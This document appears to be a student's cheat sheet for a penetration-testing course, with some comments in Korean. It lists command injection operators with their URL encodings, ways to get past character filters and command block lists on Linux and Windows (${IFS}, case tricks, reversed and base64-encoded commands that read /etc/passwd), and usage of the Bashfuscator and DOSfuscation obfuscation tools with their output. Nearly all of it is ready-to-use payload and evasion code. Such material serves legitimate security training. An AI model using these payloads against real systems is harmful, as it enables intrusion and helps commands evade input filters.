Command injection

# Injection Operators | **Injection Operator** | **Injection Character** | **URL-Encoded Character** | **Executed Command** | | ---------------------- | ----------------------- | ------------------------- | ------------------------------------------ | | Semicolon | `;` | `%3b` | Both | | New Line | `\n` | `%0a` | Both | | Background | `&` | `%26` | Both (second output generally shown first) | | Pipe | `\|` | `%7c` | Both (only second output is shown) | | AND | `&&` | `%26%26` | Both (only if first succeeds) | | OR | `\|\|` | `%7c%7c` | Second (only if first fails) | | Sub-Shell | ` `` ` | `%60%60` | Both (Linux-only) | | Sub-Shell | `$()` | `%24%28%29` | Both (Linux-only) | # Most Common Operators used for Injections | **Injection Type** | **Operators** | | --------------------------------------- | ------------------------------------------------- | | SQL Injection | `'` `,` `;` `--` `/* */` | | Command Injection | `;` `&&` | | LDAP Injection | `*` `(` `)` `&` `\|` | | XPath Injection | `'` `or` `and` `not` `substring` `concat` `count` | | OS Command Injection | `;` `&` `\|` | | Code Injection | `'` `;` `--` `/* */` `$()` `${}` `#{}` `%{}` `^` | | Directory Traversal/File Path Traversal | `../` `..\\` `%00` | | Object Injection | `;` `&` `\|` | | XQuery Injection | `'` `;` `--` `/* */` | | Shellcode Injection | `\x` `\u` `%u` `%n` | | Header Injection | `\n` `\r\n` `\t` `%0d` `%0a` `%09` | # Filtered Character Bypass - Linux | **Code** | **Description** | | ----------------------- | ---------------------------------------------------------------------------------- | | `printenv` | Can be used to view all environment variables | | Spaces | | | `%09` | Using tabs instead of spaces | | `${IFS}` | Will be replaced with a space and a tab. Cannot be used in sub-shells (i.e. `$()`) | | `{ls,-la}` | Commas will be replaced with spaces | | Other Characters | | | `${PATH:0:1}` | Will be replaced with `/` | | `${LS_COLORS:10:1}` | Will be replaced with `;` | | `$(tr '!-}' '"-~'<<<[)` | Shift character by one (`[` -> `\`) | # Blacklisted Command Bypass - Linux | Code | Description | | ------------------------------------------------------------ | ----------------------------------- | | Character Insertion | | | `'` or `"` | Total must be even | | `$@` or `\` | Linux only | | Case Manipulation | | | `$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")` | Execute command regardless of cases | | `$(a="WhOaMi";printf %s "${a,,}")` | Another variation of the technique | | Reversed Commands | | | `echo 'whoami' \| rev` | Reverse a string | | `$(rev<<<'imaohw')` | Execute reversed command | | Encoded Commands | | | `echo -n 'cat /etc/passwd \| grep 33' \| base64` | Encode a string with base64 | | `bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)` | Execute b64 encoded string | --- # Filtered Character Bypass - Windows | Code | Description | | ----------------------- | ------------------------------------------------------------ | | `Get-ChildItem Env:` | Can be used to view all environment variables - (PowerShell) | | Spaces | | | `%09` | Using tabs instead of spaces | | `%PROGRAMFILES:~10,-5%` | Will be replaced with a space - (CMD) | | `$env:PROGRAMFILES[10]` | Will be replaced with a space - (PowerShell) | | Other Characters | | | `%HOMEPATH:~0,-17%` | Will be replaced with `\` - (CMD) | | `$env:HOMEPATH[0]` | Will be replaced with `\` - (PowerShell) | # Blacklisted Command Bypass - Windows | Code | Description | | ------------------------------------- | ---------------------------------------- | | **Character Insertion** | | | `'` or `"` | Total must be even | | `^` | Windows only (CMD) | | **Case Manipulation** | | | `WhoAmi` | Simply send the character with odd cases | | **Reversed Commands** | | | `"whoami"[-1..-20] -join ''` | Reverse a string | | `iex "$('imaohw'[-1..-20] -join '')"` | Execute reversed command | **Encoded Commands** ```powershell # Encode a string with base64 [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami')) # Execute b64 encoded string iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))" ``` # Env variables cmd ```powershell 현재 환경 변수 전체 보기 set 특정 환경 변수 확인 echo %PATH% or set PATH 환경 변수 설정 (세션 한정) set MYVAR=hello 환경 변수 영구 설정 setx MYVAR hello ``` PowerShell ```powershell 현재 환경 변수 전체 보기 Get-ChildItem env: or gci env: 특정 환경 변수 확인 $env:PATH 환경 변수 설정 (세션 한정) $env:MYVAR = "hello" 환경 변수 영구 설정 setx MYVAR "hello" ``` # Character shifting ```bash echo $(tr '!-}' '"-~' <<<[) - 입력: `[` - 처리: ASCII 코드 91 → +1 → 92 (`\`) - 출력: `\` 즉, 문자 하나를 ASCII 값 기준으로 1만큼 오른쪽으로 Shift하는 변환 ``` # Evasion Tools `Bashfuscator` - Linux ```bash # Install Bashfuscator git clone https://github.com/Bashfuscator/Bashfuscator cd Bashfuscator pip3 install setuptools==65 python3 setup.py install --user cd ./bashfuscator/bin/ # print help ./bashfuscator -h # randomly pick an obfuscation technique ./bashfuscator -c 'cat /etc/passwd' [+] Mutators used: Token/ForCode -> Command/Reverse [+] Payload: ${*/+27\[X\(} ...SNIP... ${*~} [+] Payload size: 1664 characters # produce a shorter and simpler obfuscated command ./bashfuscator -c 'cat /etc/passwd' -s 1 -t 1 --no-mangling --layers 1 [+] Mutators used: Token/ForCode [+] Payload: eval "$(W0=(w \ t e c p s a \/ d);for Ll in 4 7 2 1 8 3 2 4 8 5 7 6 6 0 9;{ printf %s "${W0[$Ll]}";};)" [+] Payload size: 104 characters # test the outputted command with bash -c '' bash -c 'eval "$(W0=(w \ t e c p s a \/ d);for Ll in 4 7 2 1 8 3 2 4 8 5 7 6 6 0 9;{ printf %s "${W0[$Ll]}";};)"' ``` `DOSfuscation` - Windows ```powershell # Install DOSfuscation in PowerShell git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git cd Invoke-DOSfuscation Import-Module .\Invoke-DOSfuscation.psd1 Invoke-DOSfuscation Invoke-DOSfuscation> help # Using the tool Invoke-DOSfuscation> SET COMMAND type C:\Users\htb-student\Desktop\flag.txt Invoke-DOSfuscation> encoding Invoke-DOSfuscation\Encoding> 1 ...SNIP... Result: typ%TEMP:~-3,-2% %CommonProgramFiles:~17,-11%:\Users\h%TMP:~-13,-12%b-stu%SystemRoot:~-4,-3%ent%TMP:~-19,-18%%ALLUSERSPROFILE:~-4,-3%esktop\flag.%TMP:~-13,-12%xt # try running the obfuscated command on CMD as well C:\htb> typ%TEMP:~-3,-2% %CommonProgramFiles:~17,-11%:\Users\h%TMP:~-13,-12%b-stu%SystemRoot:~-4,-3%ent%TMP:~-19,-18%%ALLUSERSPROFILE:~-4,-3%esktop\flag.%TMP:~-13,-12%xt test_flag ```